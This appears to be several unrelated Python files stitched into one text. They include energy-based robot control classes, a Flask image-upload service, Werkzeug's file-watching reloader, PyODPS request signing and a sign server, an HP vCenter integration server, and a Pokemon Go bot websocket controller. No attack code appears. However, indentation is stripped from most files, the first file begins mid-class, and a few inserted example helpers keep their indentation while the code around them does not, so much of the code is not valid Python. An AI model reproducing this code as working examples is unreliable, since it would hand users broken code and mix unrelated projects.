def __init__(self, branches, map=None, i_temperatures=None):
super(EnergyTree, self).__init__()
if map is None:
self.map = Map()
else:
self.map = map
if i_temperatures is None:
#self.i_temperatures = torch.ones(len(branches)) #TODO: Change parameters
self.i_temperatures = torch.tensor((1.0, 1.0))
#self.i_temperatures = torch.tensor((0.2, 1.0)) # TaskGoto, PathPlan
#self.i_temperatures = nn.Parameter(i_temperatures)
self.branches = nn.ModuleList(branches)
def set_context(self, state):
state_z = self.map.map_state(state) # state -> torch.Size([1, 20]), state_z =
#processes = []
for branch in self.branches:
self.set_context_i(branch, state_z)
# branch.share_memory()
# p = mp.Process(target=self.set_context_i, args=(branch, state_z,))
# p.start()
# processes.append(p)
# for p in processes:
# p.join()
#time.sleep(0.1)
def set_context_i(self, energy, state):
energy.set_context(state)
def log_prob(self, action): # action -> torch.Size([1000, 7])
action_z = self.map.map_action(action) # FK_map, action_z -> torch.Size([1000, 7, 6]) | # Selection_map, action_z -> torch.Size([1000, 6])
logp_a = torch.zeros(action.shape[0]).to(action)
for idx, branch in enumerate(self.branches):
logp_a += self.i_temperatures[idx] * branch.log_prob(action_z)
return logp_a # torch.Size([1000])
# pool = Pool(processes=len(self.branches))
# idx = 0
# with Pool(processes=len(self.branches)) as p:
# log_prob = p.map(self.log_prob_i, self.branches,)
def log_prob_i(self, energy, action):
#print(ind)
return energy.log_prob(action)
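# A small self-contained sketch of the temperature-weighted combination performed by
# EnergyTree.log_prob() above: each branch contributes a per-particle log-probability,
# scaled by its inverse temperature. The toy branch outputs are stand-ins for real
# energy leaves and are assumptions made purely for illustration.
def _example_temperature_mixing(n_particles=4):
    branch_logps = [torch.randn(n_particles), torch.randn(n_particles)]  # toy branch outputs
    i_temperatures = torch.tensor((1.0, 1.0))
    logp_a = torch.zeros(n_particles)
    for idx, branch_logp in enumerate(branch_logps):
        logp_a += i_temperatures[idx] * branch_logp
    return logp_a  # combined log-probability per sampled particle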
class EBMControl_x(): # TODO: added on 09.13
def __init__(self, energy_tree, device, dim=10, dt=0.005, optimization_steps=100, n_particles=10000, var_0=1., stochastic=False):
self.device = device
self.energy_tree = energy_tree
self.dim = dim
## Controller ##
self.stochastic = stochastic
### Optimization ##
self.optimization_steps = optimization_steps
self.n_particles = n_particles
self.var_0 = var_0
self.optimizer = RWR(beta=0.1) # TODO: Maybe try different Black-box algorithms
## Position Action ##
self.dt = dt
def policy(self, state):
## 1. State to Torch ##
state_t = numpy2torch(state, self.device)
## 2.Compute Action ##
action_t = self.get_action(state_t, stochastic=self.stochastic) # torch.Size([7])
## 3. action2numpy
if action_t is None:
print('block')
action = torch2numpy(action_t)
return action
def get_action(self, state_t, stochastic=False):
## 1. Conditioning ##
t0 = time.time()
# TODO: initialize/update Multivariate Gaussian distribution, self.p_dx = tdist.MultivariateNormal(mu, self.var) in TaskgotoLeaf
self.energy_tree.set_context(state_t)
## 2. Compute optimal Action ##
t1 = time.time()
a_opt = self.compute_optimal_action(state_t)
t2 = time.time()
#print('inter1: {}, inter 2: {}'.format(t1-t0, t2-t1))
return a_opt
def compute_optimal_action(self, state):
mu = torch.zeros(self.dim).to(self.device)
std = torch.eye(self.dim).to(self.device) * self.var_0
self.optimizer.init_optimization()
white_noise = torch.randn(self.n_particles, self.dim).to(self.device)
for i in range(self.optimization_steps):
t0 = time.time()
# TODO: Sample from action(ddq)
action = torch.matmul(std, white_noise.T).T + mu # Random sample, torch.Size([1000, 7])
t1 = time.time()
log_p_dq = self.energy_tree.log_prob(action, state) # Energy, torch.Size([1000]) # TODO:
t2 = time.time()
mu, var = self.optimizer.optimize(action, log_p_dq) # Update mu and var based on sampled action and energy
# mu, var -> torch.Size([7])
t3 = time.time()
#print('int 1: {}, int 2: {}, int3: {}'.format(t1-t0,t2-t1,t3-t2))
std = torch.diag(torch.sqrt(var)) # torch.Size([7, 7])
return self.optimizer.best_solution.x_optima # torch.Size([7])
class EnergyTree_x(nn.Module):
'''
An Energy Tree is the base node of a Tree. It will be composed of a Mapping, that transforms state and action to some latent state
and branches
'''
def __init__(self, branches, map=None, i_temperatures=None):
super(EnergyTree_x, self).__init__()
if map is None:
self.map = Map()
else:
self.map = map
if i_temperatures is None:
self.i_temperatures = torch.ones(len(branches)) #TODO: Change parameters
#self.i_temperatures = torch.tensor((1.0, 5.))
#self.i_temperatures = torch.tensor((0.2, 1.0)) # TaskGoto, PathPlan
#self.i_temperatures = nn.Parameter(i_temperatures)
self.branches = nn.ModuleList(branches)
def set_context(self, state):
state_z = self.map.map_state(state) # state -> torch.Size([1, 20]), state_z = [torch.Size([2]), torch.Size([2])]
#processes = []
for branch in self.branches:
self.set_context_i(branch, state_z)
# branch.share_memory()
# p = mp.Process(target=self.set_context_i, args=(branch, state_z,))
# p.start()
# processes.append(p)
# for p in processes:
# p.join()
#time.sleep(0.1)
def set_context_i(self, energy, state):
energy.set_context(state)
def log_prob(self, action, state): # action -> torch.Size([1000, 7])
action_z = self.map.map_action(action) # FK_map, action_z -> torch.Size([1000, 7, 6]) | # Selection_map, action_z -> torch.Size([1000, 6])
state_z = self.map.map_state(state)
logp_a = torch.zeros(action.shape[0]).to(action)
for idx, branch in enumerate(self.branches):
logp_a += self.i_temperatures[idx] * branch.log_prob(action_z, state_z)
return logp_a # torch.Size([1000])
# pool = Pool(processes=len(self.branches))
# idx = 0
# with Pool(processes=len(self.branches)) as p:
# log_prob = p.map(self.log_prob_i, self.branches,)
def log_prob_i(self, energy, action):
#print(ind)
return energy.log_prob(action)
|
main.py
|
from flask import Flask, request, send_file
from random import choices as rndchoices
import bcrypt
import yaml
from threading import Thread
import os
import sys
# original file does NOT use pytorch, updated one DOES
# from backgroundbegone import removeBackground
from backgroundbegone2 import removeBackground
app = Flask(__name__)
images = {"a1": None} # imagename, password
imagesStorage = "images.yaml"
unprocessedImgs = "non-processed/"
processedImgs = "images/"
@app.route('/')
def home():
return "This is the home page for PicAFriend! Why are you here?"
# expects an uploaded file, plus an optional 'psswd' header containing the password (if desired)
@app.route('/upload/', methods=['POST'])
def upload():
if request.method != 'POST': return # we only want POST
f = request.files['image.png']
try:
psswd = request.headers['psswd']
except KeyError: # no password
psswd = None
# generate image key
while 1:
name = ''.join(rndchoices("ABCDEFGHIJKLMNOPQRSTUVWXYZ234567", k=8)) # 8 random base32 characters
if name not in images.keys():
break
saveAs = f"{unprocessedImgs}{name}.png"
f.save(saveAs)
Thread(target=lambda: removeBackground(saveAs)).start()
images[name] = None if psswd is None else genPassword(psswd)
saveImagesAndKeys(images)
return name
@app.route('/images/<name>')
def get_image(name):
if name not in images.keys():
return "Image not found", 404
try:
requestPassword = request.headers['psswd']
except KeyError: # no password included
requestPassword = None
password = images[name]
if password is not None and not checkPassword(password, requestPassword):
return "Incorrect password", 401
try:
return send_file(f"{processedImgs}{name}.png")
except FileNotFoundError: # image isn't done processing yet
return "Image not ready, check back in a bit", 409
def genPassword(password):
'''Returns a salted and hashed version of the original string'''
hashed = bcrypt.hashpw(password.encode(), bcrypt.gensalt())
return hashed
def checkPassword(hashedpw, unhashedpw):
return bcrypt.checkpw(unhashedpw.encode(), hashedpw)
def loadImagesAndKeys():
'''Returns the dict of images and keys that is stored in the variable images'''
try:
with open(imagesStorage, "r") as f:
imgs = yaml.safe_load(f)
except FileNotFoundError: # probably our first go, the file doesn't exist yet, lets create it
with open(imagesStorage, 'a') as f:
imgs = None
return dict() if imgs is None else imgs
def saveImagesAndKeys(imgs):
'''saves the dictionary imgs'''
with open(imagesStorage, "w+") as f:
yaml.safe_dump(imgs, f)
def main():
#TODO: task queue (so memory doesn't get out of hand)
# merge the existing (constant) dict with whatever is written to disk
images.update(loadImagesAndKeys())
# create the image directories if they don't already exist
for i in [unprocessedImgs, processedImgs]:
if not os.path.exists(i[:-1]):
os.makedirs(i[:-1])
port = int(sys.argv[1])
app.run(host="0.0.0.0", port=port)
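# A hedged client-side sketch of the two routes above, assuming the server listens on
# localhost:5000; the host, port, password and file path are illustrative only.
def _example_client_usage():
    import requests
    base = "http://localhost:5000"
    # Upload an image with an optional password header; the response body is the image key.
    with open("cat.png", "rb") as fh:
        key = requests.post(f"{base}/upload/", files={"image.png": fh},
                            headers={"psswd": "hunter2"}).text
    # Fetch the processed image back; a 409 means processing has not finished yet.
    return requests.get(f"{base}/images/{key}", headers={"psswd": "hunter2"})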
if __name__ == "__main__":
main()
|
_reloader.py
|
import fnmatch
import os
import subprocess
import sys
import threading
import time
import typing as t
from itertools import chain
from pathlib import PurePath
from ._internal import _log
# The various system prefixes where imports are found. Base values are
# different when running in a virtualenv. The stat reloader won't scan
# these directories, it would be too inefficient.
prefix = {sys.prefix, sys.base_prefix, sys.exec_prefix, sys.base_exec_prefix}
if hasattr(sys, "real_prefix"):
# virtualenv < 20
prefix.add(sys.real_prefix) # type: ignore
_ignore_prefixes = tuple(prefix)
del prefix
def _iter_module_paths() -> t.Iterator[str]:
"""Find the filesystem paths associated with imported modules."""
# List is in case the value is modified by the app while updating.
for module in list(sys.modules.values()):
name = getattr(module, "__file__", None)
if name is None:
continue
while not os.path.isfile(name):
# Zip file, find the base file without the module path.
old = name
name = os.path.dirname(name)
if name == old: # skip if it was all directories somehow
break
else:
yield name
def _remove_by_pattern(paths: t.Set[str], exclude_patterns: t.Set[str]) -> None:
for pattern in exclude_patterns:
paths.difference_update(fnmatch.filter(paths, pattern))
def _find_stat_paths(
extra_files: t.Set[str], exclude_patterns: t.Set[str]
) -> t.Iterable[str]:
"""Find paths for the stat reloader to watch. Returns imported
module files, Python files under non-system paths. Extra files and
Python files under extra directories can also be scanned.
System paths have to be excluded for efficiency. Non-system paths,
such as a project root or ``sys.path.insert``, should be the paths
of interest to the user anyway.
"""
paths = set()
for path in chain(list(sys.path), extra_files):
path = os.path.abspath(path)
if os.path.isfile(path):
# zip file on sys.path, or extra file
paths.add(path)
for root, dirs, files in os.walk(path):
# Ignore system prefixes for efficiency. Don't scan
# __pycache__, it will have a py or pyc module at the import
# path. As an optimization, ignore .git and .hg since
# nothing interesting will be there.
if root.startswith(_ignore_prefixes) or os.path.basename(root) in {
"__pycache__",
".git",
".hg",
}:
dirs.clear()
continue
for name in files:
if name.endswith((".py", ".pyc")):
paths.add(os.path.join(root, name))
paths.update(_iter_module_paths())
_remove_by_pattern(paths, exclude_patterns)
return paths
def _find_watchdog_paths(
extra_files: t.Set[str], exclude_patterns: t.Set[str]
) -> t.Iterable[str]:
"""Find paths for the stat reloader to watch. Looks at the same
sources as the stat reloader, but watches everything under
directories instead of individual files.
"""
dirs = set()
for name in chain(list(sys.path), extra_files):
name = os.path.abspath(name)
if os.path.isfile(name):
name = os.path.dirname(name)
dirs.add(name)
for name in _iter_module_paths():
dirs.add(os.path.dirname(name))
_remove_by_pattern(dirs, exclude_patterns)
return _find_common_roots(dirs)
def _find_common_roots(paths: t.Iterable[str]) -> t.Iterable[str]:
root: t.Dict[str, dict] = {}
for chunks in sorted((PurePath(x).parts for x in paths), key=len, reverse=True):
node = root
for chunk in chunks:
node = node.setdefault(chunk, {})
node.clear()
rv = set()
def _walk(node: t.Mapping[str, dict], path: t.Tuple[str, ...]) -> None:
for prefix, child in node.items():
_walk(child, path + (prefix,))
if not node:
rv.add(os.path.join(*path))
_walk(root, ())
return rv
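# A brief illustration of what _find_common_roots() computes: overlapping paths collapse
# to their outermost common directories. The POSIX-style paths are illustrative only.
def _example_common_roots():
    paths = {"/srv/app/pkg/module.py", "/srv/app/pkg", "/srv/data"}
    return _find_common_roots(paths)  # -> {"/srv/app/pkg", "/srv/data"}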
def _get_args_for_reloading() -> t.List[str]:
"""Determine how the script was executed, and return the args needed
to execute it again in a new process.
"""
rv = [sys.executable]
py_script = sys.argv[0]
args = sys.argv[1:]
# Need to look at main module to determine how it was executed.
__main__ = sys.modules["__main__"]
# The value of __package__ indicates how Python was called. It may
# not exist if a setuptools script is installed as an egg. It may be
# set incorrectly for entry points created with pip on Windows.
if getattr(__main__, "__package__", None) is None or (
os.name == "nt"
and __main__.__package__ == ""
and not os.path.exists(py_script)
and os.path.exists(f"{py_script}.exe")
):
# Executed a file, like "python app.py".
py_script = os.path.abspath(py_script)
if os.name == "nt":
# Windows entry points have ".exe" extension and should be
# called directly.
if not os.path.exists(py_script) and os.path.exists(f"{py_script}.exe"):
py_script += ".exe"
if (
os.path.splitext(sys.executable)[1] == ".exe"
and os.path.splitext(py_script)[1] == ".exe"
):
rv.pop(0)
rv.append(py_script)
else:
# Executed a module, like "python -m werkzeug.serving".
if sys.argv[0] == "-m":
# Flask works around previous behavior by putting
# "-m flask" in sys.argv.
# TODO remove this once Flask no longer misbehaves
args = sys.argv
else:
if os.path.isfile(py_script):
# Rewritten by Python from "-m script" to "/path/to/script.py".
py_module = t.cast(str, __main__.__package__)
name = os.path.splitext(os.path.basename(py_script))[0]
if name != "__main__":
py_module += f".{name}"
else:
# Incorrectly rewritten by pydevd debugger from "-m script" to "script".
py_module = py_script
rv.extend(("-m", py_module.lstrip(".")))
rv.extend(args)
return rv
class ReloaderLoop:
name = ""
def __init__(
self,
extra_files: t.Optional[t.Iterable[str]] = None,
exclude_patterns: t.Optional[t.Iterable[str]] = None,
interval: t.Union[int, float] = 1,
) -> None:
self.extra_files: t.Set[str] = {os.path.abspath(x) for x in extra_files or ()}
self.exclude_patterns: t.Set[str] = set(exclude_patterns or ())
self.interval = interval
def __enter__(self) -> "ReloaderLoop":
"""Do any setup, then run one step of the watch to populate the
initial filesystem state.
"""
self.run_step()
return self
def __exit__(self, exc_type, exc_val, exc_tb): # type: ignore
"""Clean up any resources associated with the reloader."""
pass
def run(self) -> None:
"""Continually run the watch step, sleeping for the configured
interval after each step.
"""
while True:
self.run_step()
time.sleep(self.interval)
def run_step(self) -> None:
"""Run one step for watching the filesystem. Called once to set
up initial state, then repeatedly to update it.
"""
pass
def restart_with_reloader(self) -> int:
"""Spawn a new Python interpreter with the same arguments as the
current one, but running the reloader thread.
"""
while True:
_log("info", f" * Restarting with {self.name}")
args = _get_args_for_reloading()
new_environ = os.environ.copy()
new_environ["WERKZEUG_RUN_MAIN"] = "true"
exit_code = subprocess.call(args, env=new_environ, close_fds=False)
if exit_code != 3:
return exit_code
def trigger_reload(self, filename: str) -> None:
self.log_reload(filename)
sys.exit(3)
def log_reload(self, filename: str) -> None:
filename = os.path.abspath(filename)
_log("info", f" * Detected change in {filename!r}, reloading")
class StatReloaderLoop(ReloaderLoop):
name = "stat"
def __enter__(self) -> ReloaderLoop:
self.mtimes: t.Dict[str, float] = {}
return super().__enter__()
def run_step(self) -> None:
for name in chain(_find_stat_paths(self.extra_files, self.exclude_patterns)):
try:
mtime = os.stat(name).st_mtime
except OSError:
continue
old_time = self.mtimes.get(name)
if old_time is None:
self.mtimes[name] = mtime
continue
if mtime > old_time:
self.trigger_reload(name)
class WatchdogReloaderLoop(ReloaderLoop):
def __init__(self, *args: t.Any, **kwargs: t.Any) -> None:
from watchdog.observers import Observer
from watchdog.events import PatternMatchingEventHandler
super().__init__(*args, **kwargs)
trigger_reload = self.trigger_reload
class EventHandler(PatternMatchingEventHandler): # type: ignore
def on_any_event(self, event): # type: ignore
trigger_reload(event.src_path)
reloader_name = Observer.__name__.lower()
if reloader_name.endswith("observer"):
reloader_name = reloader_name[:-8]
self.name = f"watchdog ({reloader_name})"
self.observer = Observer()
# Extra patterns can be non-Python files, match them in addition
# to all Python files in default and extra directories. Ignore
# __pycache__ since a change there will always have a change to
# the source file (or initial pyc file) as well. Ignore Git and
# Mercurial internal changes.
extra_patterns = [p for p in self.extra_files if not os.path.isdir(p)]
self.event_handler = EventHandler(
patterns=["*.py", "*.pyc", "*.zip", *extra_patterns],
ignore_patterns=[
"*/__pycache__/*",
"*/.git/*",
"*/.hg/*",
*self.exclude_patterns,
],
)
self.should_reload = False
def trigger_reload(self, filename: str) -> None:
# This is called inside an event handler, which means throwing
# SystemExit has no effect.
# https://github.com/gorakhargosh/watchdog/issues/294
self.should_reload = True
self.log_reload(filename)
def __enter__(self) -> ReloaderLoop:
self.watches: t.Dict[str, t.Any] = {}
self.observer.start()
return super().__enter__()
def __exit__(self, exc_type, exc_val, exc_tb): # type: ignore
self.observer.stop()
self.observer.join()
def run(self) -> None:
while not self.should_reload:
self.run_step()
time.sleep(self.interval)
sys.exit(3)
def run_step(self) -> None:
to_delete = set(self.watches)
for path in _find_watchdog_paths(self.extra_files, self.exclude_patterns):
if path not in self.watches:
try:
self.watches[path] = self.observer.schedule(
self.event_handler, path, recursive=True
)
except OSError:
# Clear this path from the list of watches. We don't want
# the same error message showing again in the next
# iteration.
self.watches[path] = None
to_delete.discard(path)
for path in to_delete:
watch = self.watches.pop(path, None)
if watch is not None:
self.observer.unschedule(watch)
reloader_loops: t.Dict[str, t.Type[ReloaderLoop]] = {
"stat": StatReloaderLoop,
"watchdog": WatchdogReloaderLoop,
}
try:
__import__("watchdog.observers")
except ImportError:
reloader_loops["auto"] = reloader_loops["stat"]
else:
reloader_loops["auto"] = reloader_loops["watchdog"]
def ensure_echo_on() -> None:
"""Ensure that echo mode is enabled. Some tools such as PDB disable
it which causes usability issues after a reload."""
# tcgetattr will fail if stdin isn't a tty
if sys.stdin is None or not sys.stdin.isatty():
return
try:
import termios
except ImportError:
return
attributes = termios.tcgetattr(sys.stdin)
if not attributes[3] & termios.ECHO:
attributes[3] |= termios.ECHO
termios.tcsetattr(sys.stdin, termios.TCSANOW, attributes)
def run_with_reloader(
main_func: t.Callable[[], None],
extra_files: t.Optional[t.Iterable[str]] = None,
exclude_patterns: t.Optional[t.Iterable[str]] = None,
interval: t.Union[int, float] = 1,
reloader_type: str = "auto",
) -> None:
"""Run the given function in an independent Python interpreter."""
import signal
signal.signal(signal.SIGTERM, lambda *args: sys.exit(0))
reloader = reloader_loops[reloader_type](
extra_files=extra_files, exclude_patterns=exclude_patterns, interval=interval
)
try:
if os.environ.get("WERKZEUG_RUN_MAIN") == "true":
ensure_echo_on()
t = threading.Thread(target=main_func, args=())
t.daemon = True
# Enter the reloader to set up initial state, then start
# the app thread and reloader update loop.
with reloader:
t.start()
reloader.run()
else:
sys.exit(reloader.restart_with_reloader())
except KeyboardInterrupt:
pass
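# A minimal usage sketch for run_with_reloader(), assuming a long-running serve() callable
# defined elsewhere; the extra file and reloader type are illustrative choices.
def _example_run_with_reloader(serve):
    run_with_reloader(
        serve,                        # the callable to run and restart on changes
        extra_files=["config.yaml"],  # also restart when this file changes
        reloader_type="stat",         # force the portable stat-based reloader
    )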
|
accounts.py
|
# Copyright 1999-2017 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A couple of authentication types in ODPS.
"""
import base64
import cgi
import hmac
import hashlib
import logging
import threading
import time
import requests
from .compat import six
from .compat import urlparse, unquote, parse_qsl
from . import compat, utils, options
LOG = logging.getLogger(__name__)
class BaseAccount(object):
def _build_canonical_str(self, url_components, req):
# Build signing string
lines = [req.method, ]
headers_to_sign = dict()
canonical_resource = url_components.path
params = dict()
if url_components.query:
params_list = sorted(parse_qsl(url_components.query, True),
key=lambda it: it[0])
assert len(params_list) == len(set(it[0] for it in params_list))
params = dict(params_list)
convert = lambda kv: kv if kv[1] != '' else (kv[0], )
params_str = '&'.join(['='.join(convert(kv)) for kv in params_list])
canonical_resource = '%s?%s' % (canonical_resource, params_str)
headers = req.headers
LOG.debug('headers before signing: %s' % headers)
for k, v in six.iteritems(headers):
k = k.lower()
if k in ('content-type', 'content-md5') or k.startswith('x-odps'):
headers_to_sign[k] = v
for k in ('content-type', 'content-md5'):
if k not in headers_to_sign:
headers_to_sign[k] = ''
date_str = headers.get('Date')
if not date_str:
req_date = utils.formatdate(usegmt=True)
headers['Date'] = req_date
date_str = req_date
headers_to_sign['date'] = date_str
for param_key, param_value in six.iteritems(params):
if param_key.startswith('x-odps-'):
headers_to_sign[param_key] = param_value
headers_to_sign = compat.OrderedDict([(k, headers_to_sign[k])
for k in sorted(headers_to_sign)])
LOG.debug('headers to sign: %s' % headers_to_sign)
for k, v in six.iteritems(headers_to_sign):
if k.startswith('x-odps-'):
lines.append('%s:%s' % (k, v))
else:
lines.append(v)
lines.append(canonical_resource)
return '\n'.join(lines)
def sign_request(self, req, endpoint):
raise NotImplementedError
class AliyunAccount(BaseAccount):
"""
Account of aliyun.com
"""
def __init__(self, access_id, secret_access_key):
self.access_id = access_id
self.secret_access_key = secret_access_key
def sign_request(self, req, endpoint):
url = req.url[len(endpoint):]
url_components = urlparse(unquote(url), allow_fragments=False)
canonical_str = self._build_canonical_str(url_components, req)
LOG.debug('canonical string: ' + canonical_str)
signature = base64.b64encode(hmac.new(
utils.to_binary(self.secret_access_key), utils.to_binary(canonical_str),
hashlib.sha1).digest())
auth_str = 'ODPS %s:%s' % (self.access_id, utils.to_str(signature))
req.headers['Authorization'] = auth_str
LOG.debug('headers after signing: ' + repr(req.headers))
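# A stdlib-only sketch of the signing primitive used above: the canonical string is
# HMAC-SHA1 signed with the secret key and base64-encoded before being placed in the
# 'ODPS <access_id>:<signature>' Authorization header. The key and canonical string
# below are made-up values for illustration.
def _example_sign(secret_access_key=b"my-secret",
                  canonical_str=b"GET\n\n\nSat, 01 Jan 2022 00:00:00 GMT\n/projects/x"):
    digest = hmac.new(secret_access_key, canonical_str, hashlib.sha1).digest()
    return base64.b64encode(digest)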
class SignServer(object):
class SignServerHandler(six.moves.BaseHTTPServer.BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
self.wfile.write(b"PyODPS Account Server")
def do_POST(self):
try:
self._do_POST()
except:
self.send_response(500)
self.end_headers()
def _do_POST(self):
ctype, pdict = cgi.parse_header(self.headers.get('content-type'))
if ctype == 'multipart/form-data':
postvars = cgi.parse_multipart(self.rfile, pdict)
elif ctype == 'application/x-www-form-urlencoded':
length = int(self.headers.get('content-length'))
postvars = six.moves.urllib.parse.parse_qs(self.rfile.read(length), keep_blank_values=1)
else:
self.send_response(400)
self.end_headers()
return
if self.server._token is not None:
auth = self.headers.get('Authorization')
if not auth:
self.send_response(401)
self.end_headers()
return
method, content = auth.split(' ', 1)
method = method.lower()
if method == 'token':
if content != self.server._token:
self.send_response(401)
self.end_headers()
return
else:
self.send_response(401)
self.end_headers()
return
assert len(postvars[b'access_id']) == 1 and len(postvars[b'canonical']) == 1
access_id = utils.to_str(postvars[b'access_id'][0])
canonical = utils.to_str(postvars[b'canonical'][0])
secret_access_key = self.server._accounts[access_id]
signature = base64.b64encode(hmac.new(
utils.to_binary(secret_access_key), utils.to_binary(canonical),
hashlib.sha1).digest())
auth_str = 'ODPS %s:%s' % (access_id, utils.to_text(signature))
self.send_response(200)
self.send_header("Content-Type", "text/json")
self.end_headers()
self.wfile.write(utils.to_binary(auth_str))
def log_message(self, *args):
return
class SignServerCore(six.moves.socketserver.ThreadingMixIn, six.moves.BaseHTTPServer.HTTPServer):
def __init__(self, *args, **kwargs):
self._accounts = kwargs.pop('accounts', {})
self._token = kwargs.pop('token', None)
self._ready = False
six.moves.BaseHTTPServer.HTTPServer.__init__(self, *args, **kwargs)
self._ready = True
def stop(self):
self.shutdown()
self.server_close()
def __init__(self, token=None):
self._server = None
self._accounts = dict()
self._token = token
@property
def server(self):
return self._server
@property
def accounts(self):
return self._accounts
@property
def token(self):
return self._token
def start(self, endpoint):
def starter():
self._server = self.SignServerCore(endpoint, self.SignServerHandler,
accounts=self.accounts, token=self.token)
self._server.serve_forever()
thread = threading.Thread(target=starter)
thread.daemon = True
thread.start()
while self._server is None or not self._server._ready:
time.sleep(0.05)
def stop(self):
self._server.stop()
class SignServerError(Exception):
def __init__(self, msg, code):
super(SignServerError, self).__init__(msg)
self.code = code
class SignServerAccount(BaseAccount):
_session_local = threading.local()
def __init__(self, access_id, sign_endpoint=None, server=None, port=None, token=None):
self.access_id = access_id
self.sign_endpoint = sign_endpoint or (server, port)
self.token = token
@property
def session(self):
if not hasattr(type(self)._session_local, '_session'):
adapter_options = dict(
pool_connections=options.pool_connections,
pool_maxsize=options.pool_maxsize,
max_retries=options.retry_times,
)
session = requests.Session()
# mount adapters with retry times
session.mount(
'http://', requests.adapters.HTTPAdapter(**adapter_options))
session.mount(
'https://', requests.adapters.HTTPAdapter(**adapter_options))
self._session_local._session = session
return self._session_local._session
def sign_request(self, req, endpoint):
url = req.url[len(endpoint):]
url_components = urlparse(unquote(url), allow_fragments=False)
canonical_str = self._build_canonical_str(url_components, req)
LOG.debug('canonical string: ' + canonical_str)
headers = dict()
if self.token:
headers['Authorization'] = 'token ' + self.token
resp = self.session.request('post', 'http://%s:%s' % self.sign_endpoint, headers=headers,
data=dict(access_id=self.access_id, canonical=canonical_str))
if resp.status_code < 400:
req.headers['Authorization'] = resp.text
LOG.debug('headers after signing: ' + repr(req.headers))
else:
raise SignServerError('Sign server returned error code: %d' % resp.status_code, resp.status_code)
|
server.py
|
#!/usr/bin/python
'''
Created on Aug 26, 2011
@author: IslamM
###########################################################################################
#
# server.py
#
# Copyright 2009 Hewlett-Packard Development Company, L.P.
#
# Hewlett-Packard and the Hewlett-Packard logo are trademarks of
# Hewlett-Packard Development Company, L.P. in the U.S. and/or other countries.
#
# Confidential computer software. Valid license from Hewlett-Packard required
# for possession, use or copying. Consistent with FAR 12.211 and 12.212,
# Commercial Computer Software, Computer Software Documentation, and Technical
# Data for Commercial Items are licensed to the U.S. Government under
# vendor's standard commercial license.
#
# Author:
# Mohammed M. Islam
#
# Description:
# Insight Control for vCenter main program!
#
##############################################################################################
'''
# the root directory needs to be set when running as a service.
# Next three lines will take care of that.
import logging, time, socket, os, base64
from util.environment import Environment
env = Environment()
env.set_root_dir()
from util.config import config, crypy
thisconfig = config()
import util.verbose_logging
import logging.config
logging.config.fileConfig( thisconfig.get_log_config_file() ) # Must be before imports that log
from engines.vc_engine import vc_engine
from engines.csc_engine import csc_engine
from engines import ic4vc_webserver
#from engines import data
from engines import threadpool
#from util import cmdline_opt as cmdoptions
import scomponent_server
from threading import Thread
from engines.deployment_connector import ALDeploymentConnector
log = logging.getLogger(__name__)
from util import catalog, soap
from util.smartcomponent import get_scm
from core.classes import obj
class ICVCServer:
def start(self):
log.info('Initializing ...')
if not os.path.exists('static/sc_share'):
os.makedirs('static/sc_share')
socket.setdefaulttimeout(300)
self.cfg = config()
threadpool.create()
self.crp = crypy()
soap.setup()
self.vcenters = []
try:
for vc in self.cfg.get_vcenters():
vcobj = obj()
setattr(vcobj, '__dict__', vc)
self.vcenters.append(vcobj)
except:
log.exception('Unable to retrieve vcenter list from config.json')
for vc in self.vcenters:
try:
vc.username = base64.encodestring(vc.username)
vc.password = base64.encodestring(self.crp.decode(vc.password))
except:
log.exception('Error reading credentials from config.json for vcenter %s', vc.ip)
log.info('Starting vCenters...')
vce = vc_engine(self.vcenters)
vce.start()
log.info('vCenters Started')
csce_t = Thread(target=self.start_csce, name='ICVCServer.start_csce')
csce_t.daemon = True
csce_t.start()
log.info('Starting webserver...')
self.serverwebapp = ic4vc_webserver.ServerWebApp()
self.serverwebapp.start()
log.info('webserver started')
# Start the smart component server
sc_t = Thread(target=scomponent_server.run_server, name="Smart Component HTTP server")
sc_t.daemon = True
sc_t.start()
# Create the deployment connector
ALDeploymentConnector.create()
# Unpack any smart components that the user has added to IC4vC
get_scm().discover_components()
def start_csce(self):
cs_webcfg = self.cfg.get_cswebcfg()
cs_cred = self.cfg.get_cspw()
cs_un = base64.encodestring(cs_cred.username)
cs_pw = base64.encodestring(self.crp.decode(cs_cred.epassword))
csce = csc_engine(cs_un, cs_pw, cs_webcfg)
while True:
try:
csce.send_vcenter_list(self.vcenters, base64.decodestring)
break
except:
log.debug('Unable to start csc_engine, will retry in 120 secs ...', exc_info=1)
time.sleep(120)
csce.start()
def stop(self):
self.serverwebapp.stop()
if __name__ == '__main__':
ic4vc = ICVCServer()
ic4vc.start()
while True:
time.sleep(60)
ic4vc.stop()
|
websocket_remote_control.py
|
import threading
import logging
from socketIO_client import BaseNamespace
from socketIO_client import SocketIO
from pokemongo_bot import inventory
class WebsocketRemoteControl(object):
def __init__(self, bot):
self.bot = bot
self.host, port_str = self.bot.config.websocket_server_url.split(':')
self.port = int(port_str)
self.sio = SocketIO(self.host, self.port)
self.sio.on(
'bot:process_request:{}'.format(self.bot.config.username),
self.on_remote_command
)
self.thread = threading.Thread(target=self.process_messages)
self.logger = logging.getLogger(type(self).__name__)
def start(self):
self.thread.start()
return self
def process_messages(self):
self.sio.wait()
def on_remote_command(self, command):
name = command['name']
command_handler = getattr(self, name, None)
if not command_handler or not callable(command_handler):
self.sio.emit(
'bot:send_reply',
{
'response': '',
'command': 'command_not_found',
'account': self.bot.config.username
}
)
return
if 'args' in command:
command_handler(*command['args'])
return
command_handler()
def get_player_info(self):
try:
self.sio.emit(
'bot:send_reply',
{
'result': {'inventory': inventory.jsonify_inventory(), 'player': self.bot._player},
'command': 'get_player_info',
'account': self.bot.config.username
}
)
except Exception as e:
self.logger.error(e)
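# A hedged sketch of the message shape on_remote_command() expects from the socket.io
# server: a dict naming the handler plus optional positional arguments. The payload is
# illustrative only.
EXAMPLE_REMOTE_COMMAND = {
    "name": "get_player_info",  # resolved to a method on WebsocketRemoteControl
    "args": [],                 # forwarded as positional arguments when present
}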
|
TestModule.py
|
from EaselModule import EaselModule
from PyQt5.QtGui import QKeyEvent, QMouseEvent, QWheelEvent
import threading
from time import sleep
from tk3dv.common import utilities
